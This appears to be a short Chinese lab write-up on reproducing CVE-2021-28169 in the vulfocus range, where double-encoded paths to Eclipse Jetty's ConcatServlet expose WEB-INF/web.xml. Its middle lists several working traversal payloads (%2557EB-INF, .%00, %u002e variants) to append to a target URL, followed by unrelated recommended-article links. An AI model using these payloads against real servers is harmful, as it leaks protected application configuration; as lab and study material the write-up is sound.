vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload:

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问:

对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml

相关推荐
为美好的生活献上中指16 天前
Java学习Day60:微服务总结!(有经处无火,无火处无经)
java·spring boot·spring cloud·微服务·sentinel·jetty
啥都想学的又啥都不会的研究生1 个月前
java工程启动优化
java·jvm·spring boot·spring·jetty
笨手笨脚の1 个月前
深入拆解Tomcat&Jetty(二)
java·spring·tomcat·jetty·web容器
小春学渗透2 个月前
DAY80服务攻防-中间件安全&HW2023-WPS 分析&Weblogic&Jetty&Jenkins&CVE
网络·安全·中间件·jetty·安全服务
laufing2 个月前
jenkins 安装
jdk·jenkins·jetty
前端筱悦2 个月前
在springboot中如何使用Jetty替换Tomcat
spring boot·后端·jetty
程序猿DD_3 个月前
Spring Boot中Tomcat、Jetty、Undertow哪个嵌入式服务器最好?
服务器·spring boot·后端·tomcat·jetty
健康茶天下3 个月前
网站上线3个多月了,还没有被百度收录怎么办?
spring boot·spring cloud·百度·爬山算法·jetty
MXsoft6183 个月前
jetty(v9.0.7)中间件监控指标深度解读
中间件·jetty
续亮~4 个月前
2、Netty系列-计算机网络通信及其编程:BIO、NIO、直接内存与零拷贝深入解析
java·后端·架构·nio·jetty